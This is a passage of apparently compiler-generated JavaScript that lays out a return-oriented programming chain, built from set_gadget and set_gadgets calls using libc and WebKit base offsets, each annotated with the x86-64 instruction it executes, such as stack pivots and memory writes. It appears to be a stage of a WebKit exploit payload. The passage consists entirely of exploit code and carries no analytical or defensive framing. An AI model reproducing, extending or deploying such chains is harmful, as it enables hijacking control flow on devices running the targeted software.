//pop rsi ropchain+452040, //L9661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9660: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9661: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9662: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+452136, //L9663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9663: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9665: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+452256, //L9668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+452240, //L9666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9666: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9668: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+452400, //L9671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+452368, //L9669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+452384, //L9670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9669: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9670: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9671: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+452480, //L9672 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9672: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9674: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+452600, //L9677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+452584, //L9675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9675: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9677: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+452744, //L9680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+452712, //L9678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+452728, //L9679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9678: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9679: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9680: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L9682: ropchain+452848, //L9681 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+275424, //__ntoa_long //L9681: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967216, 4294967295]); // -0x50 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+452920, //L9683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L9683: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9685: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+453000, //L9687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9687: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+466440, //L9686 //L9504: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9689: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9691: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+453160, //L9694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+453144, //L9692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9692: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9694: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+453336, //L9697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+453352, //L9698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+453304, //L9695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+453320, //L9696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9695: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9696: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9697: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9698: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, 
//movsxd rax, edi libc_base+764760, //pop rsi ropchain+453448, //L9700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+453432, //L9699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9699: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9700: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9701: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9702: db([6, 0]); // 0x6 set_gadget(libc_base+763368,); //pop rcx //L9703: db([6, 0]); // 0x6 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+453648, //L9705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9705: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+453704, //L9706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9706: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+453840, //L9710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+453824, //L9709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9708: db([32, 
0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9709: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9710: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+453976, //L9713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+454008, //L9715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+453960, //L9712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9712: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9713: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9714: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9715: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+454120, //L9716+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+454112, //L9716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9716: db([0, 0]); // 0x0 set_gadgets([ ropchain+454136, //L9716+24 ropchain+455512, //L9711 libc_base+764760, //pop rsi ropchain+454176, //L9717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9717: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9719: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+454296, //L9722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+454280, //L9720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop 
rcx ]); //L9720: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9722: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+454456, //L9726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+454408, //L9723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+454424, //L9724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9723: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9724: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9725: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L9726: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+454512, //L9727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9727: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9729: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+454632, //L9730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+454648, //L9732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9730: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9732: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+454824, //L9735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+454840, //L9736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+454792, //L9733 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+454808, //L9734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9733: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9734: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9735: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9736: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+454920, //L9737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+454936, //L9738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9737: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9738: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+455016, //L9739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+455032, //L9740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9739: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9740: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+455192, //L9744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+455160, //L9742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+455176, //L9743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9741: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9742: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9743: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9744: db([0, 0]); // 0x0 
set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+455248, //L9746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9746: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+455376, //L9748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+455392, //L9749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+455360, //L9747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9747: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9748: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9749: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+455488, //L9752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+455472, //L9751 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9751: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9752: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+458928, //L9750 //L9711: libc_base+764760, //pop rsi ropchain+455552, //L9753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9753: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9755: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+455672, //L9758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+455656, //L9756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9756: 
db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9758: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+455848, //L9761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+455864, //L9762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+455816, //L9759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+455832, //L9760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9759: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9760: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9761: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9762: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+455960, //L9764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+455944, //L9763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9763: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9764: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9765: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9766: db([7, 0]); // 0x7 set_gadget(libc_base+763368,); //pop rcx //L9767: db([7, 0]); // 0x7 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, 
rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+456160, //L9769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9769: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+456216, //L9770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9770: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+456352, //L9774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+456336, //L9773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9772: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9773: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9774: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+456488, //L9777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+456520, //L9779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+456472, //L9776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9776: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9777: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9778: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9779: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi 
ropchain+456632, //L9780+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+456624, //L9780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9780: db([0, 0]); // 0x0 set_gadgets([ ropchain+456648, //L9780+24 ropchain+458024, //L9775 libc_base+764760, //pop rsi ropchain+456688, //L9781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9781: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9783: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+456808, //L9786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+456792, //L9784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9784: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9786: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+456968, //L9790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+456920, //L9787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+456936, //L9788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9787: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9788: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9789: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L9790: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+457024, //L9791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9791: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L9793: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+457144, //L9794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+457160, //L9796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9794: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9796: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+457336, //L9799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+457352, //L9800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+457304, //L9797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+457320, //L9798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9797: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9798: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9799: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9800: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+457432, //L9801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+457448, //L9802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9801: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9802: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+457528, //L9803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+457544, //L9804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9803: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9804: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+457704, //L9808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+457672, //L9806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+457688, //L9807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9805: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L9806: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9807: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9808: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+457760, //L9810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9810: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+457888, //L9812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+457904, //L9813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+457872, //L9811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9811: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9812: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9813: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+458000, //L9816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+457984, //L9815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9815: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9816: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+458928, //L9814 //L9775: libc_base+764760, //pop rsi ropchain+458064, //L9817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9817: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9819: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+458184, //L9822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+458168, //L9820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9820: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9822: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+458344, //L9826 